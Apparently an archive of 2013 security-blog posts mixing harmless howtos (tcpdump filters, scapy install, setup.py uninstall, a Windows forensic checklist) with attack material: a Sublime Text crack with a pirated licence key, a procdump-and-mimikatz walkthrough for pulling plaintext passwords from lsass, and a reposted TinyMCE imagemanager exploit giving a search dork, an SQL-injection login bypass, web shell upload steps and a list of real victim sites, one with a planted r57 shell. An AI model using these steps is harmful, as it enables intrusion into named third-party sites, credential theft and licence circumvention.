Nov 8, 2013

Crack: Register Sublime Text 2 for free [Mac OS X version]

1. cd /Applications/Sublime\ Text\ 2.app/Contents/MacOS/
2. open the binary in vim ->> "vim Sublime\ Text\ 2"
3. switch the whole buffer to hex ->> ":%!xxd"
4. find and replace ->> ":%s/5BE509C33B020111/5BE509C32B020111/g"



Then enter this license (Help > Enter License):
—–BEGIN LICENSE—–
Patrick Carey
Unlimited User License
EA7E-18848
4982D83B6313800EBD801600D7E3CC13
F2CD59825E2B4C4A18490C5815DF68D6
A5EFCC8698CFE589E105EA829C5273C0
C5744F0857FAD2169C88620898C3845A
1F4521CFC160EEC7A9B382DE605C2E6D
DE84CD0160666D30AA8A0C5492D90BB2
75DEFB9FD0275389F74A59BB0CA2B4EF
EA91E646C7F2A688276BCF18E971E372
—–END LICENSE—–


Source: http://shobhitjain26.wordpress.com/tag/sublime-license-key/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: HashTag - hash identification tool

Usage: HashTag.py {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]
  -h, --help            show this help message and exit
  -sh SINGLEHASH, --singleHash SINGLEHASH
                        Identify a single hash
  -f FILE, --file FILE  Parse a single file for hashes and identify them
  -d DIRECTORY, --directory DIRECTORY
                        Parse, identify, and categorize hashes within a directory and all subdirectories
  -o OUTPUT, --output OUTPUT
                        Filename to output full list of all identified hashes
                        --file default filename: HashTag/HashTag_Output_File.txt
                        --directory default filename: HashTag/HashTag_Hash_File.txt
  -hc, --hashcatOutput  --file: Output a file per different hash type found, if a corresponding hashcat mode exists
                        --directory: Appends the hashcat mode to the end of the separate files
  -n, --notFound        --file: Include unidentifiable hashes in the output file. Good for tool debugging (is it identifying properly?)

Identify a single hash (-sh):

HashTag.py -sh $1$MtCReiOj$zvOdxVzPtrQ.PXNW3hTHI0
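What a tool like this does under the hood is pattern-match the hash format and map each candidate to a hashcat mode. The following is an added example written for this page, not HashTag's own code: a small identifier for common formats (the table is a constructed, illustrative subset, and the sample dump is made up; the 32-hex case shows why an identifier has to return several candidates, since MD5, NTLM, MD4 and LM are indistinguishable by shape).

```python
import re

# Added example, not HashTag's own code: identify candidate algorithms for a hash
# from its format alone and map each to the hashcat mode used to crack it.
# The table is a constructed subset of common formats; mode numbers are hashcat's.
B64CRYPT = r"[./0-9A-Za-z]"
HASH_PATTERNS = [
    # (label, hashcat mode, regex for the whole token); order = most likely first
    ("MD5 Crypt ($1$)",          500,  re.compile(r"^\$1\$%s{1,8}\$%s{22}$" % (B64CRYPT, B64CRYPT))),
    ("Apache APR1 MD5 ($apr1$)", 1600, re.compile(r"^\$apr1\$%s{1,8}\$%s{22}$" % (B64CRYPT, B64CRYPT))),
    ("SHA-256 Crypt ($5$)",      7400, re.compile(r"^\$5\$(?:rounds=\d+\$)?%s{1,16}\$%s{43}$" % (B64CRYPT, B64CRYPT))),
    ("SHA-512 Crypt ($6$)",      1800, re.compile(r"^\$6\$(?:rounds=\d+\$)?%s{1,16}\$%s{86}$" % (B64CRYPT, B64CRYPT))),
    ("bcrypt ($2a$/$2b$/$2y$)",  3200, re.compile(r"^\$2[aby]\$\d{2}\$%s{53}$" % B64CRYPT)),
    ("MySQL 4.1+ (*SHA1(SHA1))", 300,  re.compile(r"^\*[0-9A-F]{40}$")),
    ("MD5",                      0,    re.compile(r"^[0-9a-fA-F]{32}$")),
    ("NTLM",                     1000, re.compile(r"^[0-9a-fA-F]{32}$")),
    ("MD4",                      900,  re.compile(r"^[0-9a-fA-F]{32}$")),
    ("LM",                       3000, re.compile(r"^[0-9a-fA-F]{32}$")),
    ("SHA-1",                    100,  re.compile(r"^[0-9a-fA-F]{40}$")),
    ("SHA-256",                  1400, re.compile(r"^[0-9a-fA-F]{64}$")),
    ("SHA-512",                  1700, re.compile(r"^[0-9a-fA-F]{128}$")),
]

# Constructed sample of a dumped credential file (user:hash per line). The first
# hash is the MD5 of a common dictionary word; the $6$ one is a shape-only dummy.
SAMPLE_DUMP = """\
alice:5f4dcc3b5aa765d61d8327deb882cf99
bob:$1$MtCReiOj$zvOdxVzPtrQ.PXNW3hTHI0
carol:$6$rounds=5000$saltsalt$%s
dave:not_a_hash
""" % ("A" * 86)


def identify(token):
    """All formats `token` could be, most likely first, as (label, hashcat_mode); [] if unrecognised."""
    token = token.strip()
    return [(label, mode) for label, mode, rx in HASH_PATTERNS if rx.match(token)]


def identify_text(text):
    """Scan free text for hash-shaped tokens (split on whitespace and ':' so user:hash lines work).
    Unrecognised tokens are dropped, which is what HashTag does unless -n is given."""
    found = {}
    for token in re.findall(r"[^\s:]+", text):
        if token not in found:
            cands = identify(token)
            if cands:
                found[token] = cands
    return found


def group_by_hashcat_mode(text):
    """Group hashes by their most-likely hashcat mode: one list per mode, the shape of
    HashTag's -hc per-type output files."""
    groups = {}
    for token, cands in identify_text(text).items():
        groups.setdefault(cands[0][1], []).append(token)
    return groups


if __name__ == "__main__":
    for token, cands in identify_text(SAMPLE_DUMP).items():
        print(token, "->", cands)
```

Ambiguous lengths are the reason the tool offers a "most likely" guess and a full candidate list: a 32-hex string from a Windows SAM dump is NTLM (mode 1000), while the same shape from a web application is almost always MD5 (mode 0); only the source of the dump tells you which mode to run.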


Download Link: https://raw.github.com/SmeegeSec/HashTag/master/HashTag.py 

Source: http://www.smeegesec.com/2013/11/hashtag-password-hash-identification.html



Nov 7, 2013

Howto: Uninstall with setup.py script

1. To record the list of installed files, install with --record:
python setup.py install --record files.txt

2. To uninstall, remove everything in that list. Feed the file to xargs NUL-delimited so paths containing spaces survive, and use plain rm -f: the record lists files, not directories, so -r is not needed and only adds risk:
tr '\n' '\0' < files.txt | xargs -0 rm -f

The package directory and its egg-info directory are left behind empty; remove them afterwards (rmdir refuses to delete anything that is not empty, which is the safe way to do it).
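The same procedure done properly, as an added example for this page (not from the original post): it reads a `--record` file, removes only existing files, then prunes the directories the removal emptied, never climbing to or above the common parent of the recorded files (normally site-packages). The `demo()` function builds a constructed install layout in a temporary directory, including a path with a space, and uninstalls it, so the code runs without touching a real Python installation.

```python
import os
import shutil
import tempfile


def uninstall_from_record(record_path):
    """Remove every path listed in a `setup.py install --record` file, then prune the
    directories the removal left empty. Returns (removed_files, removed_dirs).
    Paths with spaces are fine, which `cat files.txt | xargs rm -rf` cannot promise."""
    with open(record_path, encoding="utf-8") as fh:
        paths = [line.rstrip("\r\n") for line in fh if line.strip()]

    removed_files = []
    for p in paths:
        if os.path.islink(p) or os.path.isfile(p):
            os.remove(p)
            removed_files.append(p)

    # Prune emptied directories deepest-first, and never rmdir the common parent of the
    # recorded files or anything above it, so an empty site-packages is left alone.
    parents = {os.path.dirname(p) for p in paths}
    stop = os.path.commonpath(parents) if parents else ""
    removed_dirs = []
    for d in sorted(parents, key=lambda d: d.count(os.sep), reverse=True):
        while d != stop and d.startswith(stop + os.sep) and os.path.isdir(d) and not os.listdir(d):
            os.rmdir(d)
            removed_dirs.append(d)
            d = os.path.dirname(d)
    return removed_files, removed_dirs


def demo():
    """Constructed layout: package dir, egg-info dir and an unrelated module that must
    survive, under a directory whose name contains a space. Returns what happened."""
    root = tempfile.mkdtemp()
    site = os.path.join(root, "site packages")
    installed = ["foo/__init__.py", "foo/sub/mod.py", "foo-1.0.egg-info/PKG-INFO"]
    for rel in installed + ["other.py"]:
        full = os.path.join(site, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("# sample\n")
    record = os.path.join(root, "files.txt")
    with open(record, "w") as fh:
        fh.write("".join(os.path.join(site, rel) + "\n" for rel in installed))

    files, dirs = uninstall_from_record(record)
    result = {
        "removed_files": len(files),
        "removed_dirs": sorted(os.path.relpath(d, site) for d in dirs),
        "other_kept": os.path.isfile(os.path.join(site, "other.py")),
        "site_kept": os.path.isdir(site),
    }
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

The common-parent guard matters more than it looks: a record that spans both a `bin/` script and `lib/pythonX/site-packages/` has a very shallow common parent, so a pruning loop without the guard could walk up and delete an empty `site-packages` or `lib/pythonX` directory.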

 




Howto: Install scapy in Mac OSX

1. Install Xcode and the Command Line Tools

2. Install Scapy
$ wget scapy.net
$ unzip scapy-latest.zip
$ cd scapy-2.*
$ sudo python setup.py install


3. Install pylibpcap: download it from http://sourceforge.net/projects/pylibpcap/, extract it, and run
$ sudo python setup.py install

4. Download and install libdnet with MacPorts (fixes ImportError: No module named dnet)
$ sudo port selfupdate
$ sudo port upgrade outdated
$ sudo port install py27-libdnet
$ sudo port install libdnet
$ sudo cp /opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dnet.so /Library/Python/2.7/site-packages
5. Edit /Library/Python/2.7/site-packages/scapy/arch/unix.py (fixes OSError: Device not configured)

read_routes() runs netstat and scapy later tries to open every Netif that appears in the routing table. On OS X the VirtualBox host-only (vboxnetN) and bridge interfaces cannot be opened, which is what raises the error, so filter them out of the netstat output. The branch that runs on OS X is the plain "netstat -rn" one (the non-Solaris branch, around line 37 of this scapy version):

line 37 : f=os.popen("netstat -rn") # -f inet
Change to: f=os.popen("netstat -rn | grep -v vboxnet | grep -v bridge") # -f inet

The post applied the same filter to the Solaris branch on line 34 as well; that is harmless but not the line that runs on a Mac, and if you touch it keep the -rvn flags:

def read_routes():
    if scapy.arch.SOLARIS:
#       f=os.popen("netstat -rvn") # -f inet
        f=os.popen("netstat -rvn | grep -v vboxnet | grep -v bridge")
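To make the fix concrete, here is an added example (written for this page, not scapy's code) that parses the "Internet:" table of OS X `netstat -rn` the way read_routes() has to, and drops the routes whose interface scapy cannot open; the sample output is constructed to look like a Mac with VirtualBox installed, and the interface-name prefixes are the ones the grep -v edit above removes.

```python
# Added example, not scapy's code: parse OS X `netstat -rn` and skip routes on
# interfaces that libpcap cannot open, the effect of the grep -v edit above.

# Constructed sample: a Mac with an Ethernet interface, a VirtualBox host-only
# network and a bridge interface.
SAMPLE_NETSTAT_RN = """\
Routing tables

Internet:
Destination        Gateway            Flags        Refs      Use   Netif Expire
default            192.168.1.1        UGSc           20        0     en0
127                127.0.0.1          UCS             0        0     lo0
127.0.0.1          127.0.0.1          UH              2    17311     lo0
169.254            link#4             UCS             0        0     en0
192.168.1          link#4             UCS             4        0     en0
192.168.1.1        0:11:22:33:44:55   UHLWIir        21      130     en0   1183
192.168.56         link#8             UC              1        0 vboxnet0
192.168.56.1       a:0:27:0:0:0       UHLWIi          1        0     lo0
192.168.99         link#9             UC              0        0 bridge100

Internet6:
Destination                             Gateway                         Flags         Netif Expire
::1                                     ::1                             UHL             lo0
"""

SKIP_NETIF_PREFIXES = ("vboxnet", "bridge")


def parse_netstat_rn(text, skip_prefixes=SKIP_NETIF_PREFIXES):
    """Return the IPv4 routes as dicts (dest, gateway, flags, netif), minus routes on
    interfaces whose name starts with one of skip_prefixes."""
    lines = iter(text.splitlines())
    for line in lines:
        if line.strip() == "Internet:":
            break
    else:
        return []                                   # no IPv4 table at all
    header = next(lines, "").split()
    if "Netif" not in header:
        raise ValueError("unexpected netstat -rn header: %r" % (header,))
    netif_col = header.index("Netif")               # column order differs across OS X releases
    routes = []
    for line in lines:
        fields = line.split()
        if not fields:
            break                                   # blank line ends the Internet: section
        if len(fields) <= netif_col:
            continue                                # malformed line; Expire may be absent, Netif may not
        netif = fields[netif_col]
        if netif.startswith(skip_prefixes):         # str.startswith accepts a tuple of prefixes
            continue
        routes.append({"dest": fields[0], "gateway": fields[1], "flags": fields[2], "netif": netif})
    return routes


def interfaces_to_open(text, skip_prefixes=SKIP_NETIF_PREFIXES):
    """The interfaces scapy would go on to open after reading these routes."""
    return sorted({r["netif"] for r in parse_netstat_rn(text, skip_prefixes)})


if __name__ == "__main__":
    print(interfaces_to_open(SAMPLE_NETSTAT_RN, ()))   # unfiltered: includes vboxnet0, bridge100
    print(interfaces_to_open(SAMPLE_NETSTAT_RN))       # filtered: en0, lo0 only
```

The header lookup rather than a fixed column index is deliberate: the Netif column has moved between OS X versions (some print an Mtu column), and a parser pinned to one layout silently returns wrong interface names on another.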



Nov 6, 2013

Howto: Tcpdump filter HTTP

#### Filter HTTP GET requests
sudo tcpdump -s 0 -A 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420'
OR
tcpdump -i eth1 'tcp[32:4] = 0x47455420'

The first form reads the TCP data offset (the high nibble of byte 12, counted in 32-bit words; ">> 4" followed by "* 4" is the same as ">> 2") to find where the payload starts, then compares its first four bytes with 0x47455420 ("GET "). The second form hardcodes a 32-byte TCP header (20 bytes plus the 12 bytes of NOP/NOP/timestamp options most Linux stacks send), so it misses requests in segments with any other option length.

#### Filter HTTP POST requests
sudo tcpdump -s 0 -A 'tcp dst port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)'

# monitor HTTP traffic including request and response headers and message body
# (every segment with a non-empty TCP payload: IP total length minus IP header length minus TCP header length != 0)
# cf. https://sites.google.com/site/jimmyxu101/testing/use-tcpdump-to-monitor-http-traffic
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

The GET/POST filters match only the segment that carries the start of the request, and none of these see anything inside TLS.
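The byte arithmetic in those filters, worked through in Python as an added example (not from the original post): the functions mirror the BPF expressions on constructed IPv4/TCP packets (addresses, ports and checksums are placeholders), so the data-offset filter and the hardcoded `tcp[32:4]` form can be compared on a segment with and without TCP options.

```python
import struct

# Added example, not from the original post: the offset arithmetic behind the
# tcpdump filters above, applied to constructed packets that begin at the IP
# header (which is what tcpdump's ip[] and tcp[] index into).


def ip_header_len(pkt):
    """IP header length in bytes: IHL is the low nibble of byte 0, in 32-bit words.
    BPF: (ip[0]&0xf)<<2"""
    return (pkt[0] & 0x0F) << 2


def tcp_header_len(pkt):
    """TCP header length in bytes: data offset is the high nibble of TCP byte 12,
    in 32-bit words.  BPF: (tcp[12]&0xf0)>>2  (>>4 for the nibble, then <<2 for *4)"""
    return (pkt[ip_header_len(pkt) + 12] & 0xF0) >> 2


def tcp_payload(pkt):
    """TCP payload bounded by the IP total length field (ip[2:2]); its length is
    what the 'monitor HTTP traffic' filter tests for != 0."""
    total_len = struct.unpack("!H", pkt[2:4])[0]
    return pkt[ip_header_len(pkt) + tcp_header_len(pkt):total_len]


def first_payload_word(pkt):
    """The 4 bytes the data-offset filter compares with 0x47455420 (b'GET ') or
    0x504f5354 (b'POST')."""
    return tcp_payload(pkt)[:4]


def fixed_offset_word(pkt):
    """The 4 bytes tcp[32:4] compares: right only when the TCP header is exactly 32 bytes."""
    start = ip_header_len(pkt) + 32
    return pkt[start:start + 4]


def build_packet(tcp_options=b"", payload=b""):
    """Constructed IPv4 + TCP packet with consistent length fields (checksums left zero)."""
    assert len(tcp_options) % 4 == 0, "TCP options are padded to 32-bit words"
    tcp_len = 20 + len(tcp_options)
    total_len = 20 + tcp_len + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, (tcp_len // 4) << 4, 0x18, 65535, 0, 0)
    return ip + tcp + tcp_options + payload


# The common Linux option block: NOP, NOP, timestamp (kind 8, length 10) = 12 bytes,
# giving the 32-byte TCP header that tcp[32:4] silently assumes.
TS_OPTIONS = b"\x01\x01\x08\x0a" + b"\x00" * 8


if __name__ == "__main__":
    for name, pkt in [("with timestamps", build_packet(TS_OPTIONS, b"GET / HTTP/1.1\r\n")),
                      ("no options", build_packet(b"", b"GET / HTTP/1.1\r\n"))]:
        print(name, "data-offset filter:", first_payload_word(pkt) == b"GET ",
              "tcp[32:4] filter:", fixed_offset_word(pkt) == b"GET ")
```

The IP total length bound in `tcp_payload` is the same reason the payload-length filter subtracts from `ip[2:2]` instead of trusting the captured frame size: Ethernet pads short frames, so a pure ACK can arrive with trailing padding bytes that are not TCP data.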

 


Nov 5, 2013

Howto: Plaintext passwords with Procdump and Mimikatz Alpha

The point of the two-step approach is that only a signed Microsoft Sysinternals tool runs on the target; mimikatz is run offline against the dump.

1. Upload the Microsoft "Procdump" tool to the server.
2. Dump the memory of the lsass process to the file lsass.dmp (-ma writes a full memory dump):
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp        (32-bit)
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp    (64-bit)
3. Download the generated lsass.dmp.
4. Run mimikatz alpha (the build with the same bitness as the dumped lsass) against lsass.dmp:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full


Source: http://www.securityartwork.es/2013/11/04/plaintext-passwords-with-procdump-and-mimikatz-alpha/?lang=en



Formoid easiest form generator

Formoid makes creating beautiful web forms a cinch and a joy. With a no-coding drag-n-drop GUI, trendy Flat, Metro, Bootstrap form themes, pure css styled, responsive, retina-ready form elements, as-you-type validation, anti-spam captcha - Formoid is a just incredible form tool!

Source: http://formoid.com/


Nov 4, 2013

Windows Forensic Commands

1. Name of System and the Current Time:
C:\>hostname
WIN-xxxxxxxxx7
C:\>whoami
win-xxxxxxxxxx7\my name
C:\>echo %DATE% %TIME%
Fri 01/20/2012 20:52:34.28
C:\>wmic timezone list brief
Bias  Caption            SettingID
540   (UTC+09:00) Seoul

2. IP Address of the targeted system: 
C:\>ipconfig /allcompartments /all

3. Serial number of the system (this is going to be a bit off since I am on a Vmware instance):
C:\>wmic csproduct get name
Name
VMware Virtual Platform
C:\>wmic bios get serialnumber
SerialNumber
VMware-00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

4. OS of the targeted system:
C:\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
C:\>ver
Microsoft Windows [Version 6.1.7601]

5. MAC Address of the system NIC:
C:\>wmic nicconfig get description,IPAddress,MACaddress
Description                               IPAddress          MACAddress
Intel(R) PRO/1000 MT Network Connection   {"192.168.1.151"}  00:00:00:00:00:00
RAS Async Adapter                                            00:00:00:00:00:00
Bluetooth Device (Personal Area Network)
—-cut out some output—-

6. How long has the system been online:
C:\>uptime.exe
\\WIN-xxxxxxxxxx7 has been up for: 0 day(s), 0 hour(s), 34 minute(s), 37 second(s)
7. Date and/or Level of Latest Patch:
C:\>wmic qfe get Hotfixid        (or, for a bit more detail with dates: C:\>wmic qfe list)
HotFixID
KB971033
KB2305420
KB2393802
KB2425227
—-cut out most of the output—-

8. System Hardware:
C:\>wmic computersystem get manufacturer (assuming this would say, “Dell” if I was on a physical machine)
Manufacturer
VMware, Inc.

9. Software Installed on the System: I prefer wmic product list the best because it pulls install dates.
C:\>wmic product list
C:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Note: wmic product queries the Win32_Product class, which makes Windows Installer validate (and, where it finds a problem, repair) every installed MSI package; it is slow and modifies the system under investigation. The registry query is the non-intrusive option (on 64-bit Windows also query the Wow6432Node\...\Uninstall key for 32-bit software).

10. Do you have EFS running on the system?
C:\>cipher /y
EFS certificate thumbprint for computer WIN-xxxxxxxxxx7:
  0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
C:\>cipher /s:"New Folder"
Listing C:\New Folder\
New files added to this directory will be encrypted.
E Meh.txt
E Foo.txt
E = Encrypted

11. Is there a firewall protecting the system? If so, do you have logs?
C:\>copy %windir%\System32\Logfiles\Firewall\*.log
C:\>netsh firewall show state
C:\>netsh firewall show config
C:\>netsh dump
Try these yourself. Too much information to paste here. On Windows 7 and later the "netsh firewall" context is deprecated; "netsh advfirewall show allprofiles" gives the per-profile state and logging settings instead.

12. Is there any volatile network data?
C:\>route print
C:\>arp -a
C:\>netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       392
—–cut out most of the output—–
C:\>net start
These Windows services are started:
   Application Information
   Background Intelligent Transfer Service
   Base Filtering Engine
   Bluetooth Support Service
   COM+ Event System
—–cut out most of the output—–
C:\>net user        (or C:\>wmic useraccount list)
User accounts for \\WIN-xxxxxxxxxx7
—————————————————————
Administrator            Guest                    My Name
The command completed successfully.
C:\>net use
New connections will be remembered.
Status       Local     Remote                    Network
———————————————————————
Z:        \\vmware-host\Shared Folders VMware Shared Folders
The command completed successfully.
C:\>type %windir%\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
C:\>type %windir%\System32\drivers\etc\networks
# For example:
#
#    loopback     127
#    campus       284.122.107
#    london       284.122.108
loopback                 127

14. Are there event logs?
C:\>wmic nteventlog get name
Use this output to create the next command:
C:\>copy %windir%\System32\Winevt\Logs\*.evtx
Those were all of the questions asked on the incident response checklist I found online. My work one is much more detailed, but I don’t have permission to release all of its contents nor will I get permission. I suggest all of you go through the “actionable” items so you’re not surprised when an incident DOES occur (not IF).
Other “general questions” to ask in no particular order are:
Point of contact information.
What is the system used for?
What kind of information is stored on this system (Classified, PII, etc.)?
Is it public facing, or is it an internal system?
Is it a server or workstation?
Other Commands and Tools to run to collect information:
wmic process list status
wmic process list memory
wmic job list brief
wmic startup list brief
wmic ntdomain list brief
wmic service list config
handle.exe /accepteula
gplist
listdlls.exe
logonsessions.exe /accepteula
pslist.exe /accepteula
psloggedon.exe /accepteula
tasklist
tcpvcon.exe -a /accepteula
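The volatile network data in item 12 is only useful once each socket is tied to the process that owns it. As an added example for this page (not part of the original checklist), the following parses `netstat -ano` output and the CSV form of `tasklist` (`tasklist /fo csv`) collected from the same host and joins them on PID. The sample outputs are constructed: the three LISTENING rows mirror the ones shown above, the ESTABLISHED and UDP rows and the tasklist are made up for the example, and PID 3120 is deliberately missing from the tasklist to show the case an analyst must not ignore.

```python
import csv
import io
import re

# Added example, not from the original checklist: join `netstat -ano` with
# `tasklist /fo csv` so every socket is shown with the image that owns its PID.

# Constructed samples (the listening rows follow the netstat output shown above).
SAMPLE_NETSTAT_ANO = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       392
  TCP    192.168.1.151:49321    203.0.113.10:443       ESTABLISHED     2812
  TCP    192.168.1.151:49400    198.51.100.7:4444      ESTABLISHED     3120
  UDP    0.0.0.0:500            *:*                                    840
"""
SAMPLE_TASKLIST_CSV = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","1,396 K"
"wininit.exe","392","Services","0","4,160 K"
"svchost.exe","684","Services","0","7,228 K"
"svchost.exe","840","Services","0","9,012 K"
"chrome.exe","2812","Console","1","121,004 K"
"""

# One netstat row: proto, local, foreign, optional State (UDP rows have none), PID.
NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def parse_netstat_ano(text):
    """Rows of `netstat -ano` as dicts; header and title lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            rows.append({"proto": proto, "local": local, "remote": remote,
                         "state": state or "", "pid": int(pid)})
    return rows


def parse_tasklist_csv(text):
    """PID -> image name from `tasklist /fo csv`."""
    return {int(r["PID"]): r["Image Name"] for r in csv.DictReader(io.StringIO(text))}


def join_with_processes(netstat_text, tasklist_text):
    """Every socket with the owning image name. A PID absent from the tasklist means the
    process exited between the two snapshots, or is hiding from tasklist: look at it."""
    procs = parse_tasklist_csv(tasklist_text)
    rows = parse_netstat_ano(netstat_text)
    for r in rows:
        r["image"] = procs.get(r["pid"], "<not in tasklist>")
    return rows


def listening_ports_by_process(netstat_text, tasklist_text):
    """(pid, image) -> ['TCP 0.0.0.0:135', ...] for TCP listeners and all UDP sockets."""
    out = {}
    for r in join_with_processes(netstat_text, tasklist_text):
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue
        out.setdefault((r["pid"], r["image"]), []).append(r["proto"] + " " + r["local"])
    return out


def established_connections(netstat_text, tasklist_text):
    """ESTABLISHED sockets with their image: the list to check for unexpected peers."""
    return [r for r in join_with_processes(netstat_text, tasklist_text) if r["state"] == "ESTABLISHED"]


if __name__ == "__main__":
    for r in established_connections(SAMPLE_NETSTAT_ANO, SAMPLE_TASKLIST_CSV):
        print(r["pid"], r["image"], r["local"], "->", r["remote"])
```

On a live system `netstat -anob` (elevated) prints the executable per socket directly, but the two-snapshot join is still worth doing: the gap between the netstat and tasklist snapshots, and a PID that appears in one but not the other, is exactly the kind of discrepancy a checklist run is meant to surface.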


Source:  http://sysforensics.org/2012/01/incident-response-checklist-actions.html



Tools: umap

umap is a tool which allows you to test the security of USB host implementations i.e. something you plug a USB device into, like a PC or a tablet. Its primary function at the moment is a fuzzer with test cases based on a combination of data from standards documentation and the author's experience of where USB bugs are commonly found. However, it also has additional functionality that will be expanded further in future versions, for example:
  • Operating system identification
  • Installed application identification
  • Vendor-specific driver enumeration
  • Endpoint Protection System assessment
Source: https://github.com/nccgroup/umap/wiki/umap-documentation




TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

> Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

> Author : KedAns-Dz
+ E-mail : ked-h (@hotmail.com / @1337day.com)
+ FaCeb0ok : fb.me/Inj3ct0rK3d
+ TwiTter : @kedans

# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple

*************************************************************************/

# TinyMCE v3.2.7 (and other 3.2.x builds shipping the imagemanager plugin) suffers from multiple vulnerabilities.
# A remote attacker can bypass the plugin's authentication and upload files, including web shells.
# First, find targets with this dork:
google dork : allinurl:/plugins/imagemanager/pages/im/index.html

# (1) How to bypass auth =>
The login can be bypassed with a simple SQL-injection-style payload submitted as both username and password:
  site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
  user & pass : '1'OR'1'
 =+ demos :
 http://www.prodigy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
 user : '1'OR'1'
 pass : '1'OR'1'
 http://www.erez-komarovsky.co.il/admin/login.php
 user: 1' OR '1'='1
 pass: 1' OR '1'='1
 
 && or, if the simple payload does not work, open
 site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
 and quickly click the browser's stop button to interrupt the redirect to the login page ;)
 
# (2) Upload shells/files: .txt or .gif directly, or .php by rewriting the request with Tamper Data or by editing the HTTP headers =>

poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html
click the ( upload / add / [+] ) button and upload what you need ;)
for example:
    shell after upload : http://www.prodigy-school.ru/data/r57.txt

 =+ Demo's:
  
http://www.allemandemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
http://gesundheit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.yorkshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.erez-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://freewb.hu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://volunteermckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.eastpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm
http://209.18.48.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html

# Take care kid's & 1337day Fan's :D
# Ked is Back ^_^ <3

####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^  !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database.+>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
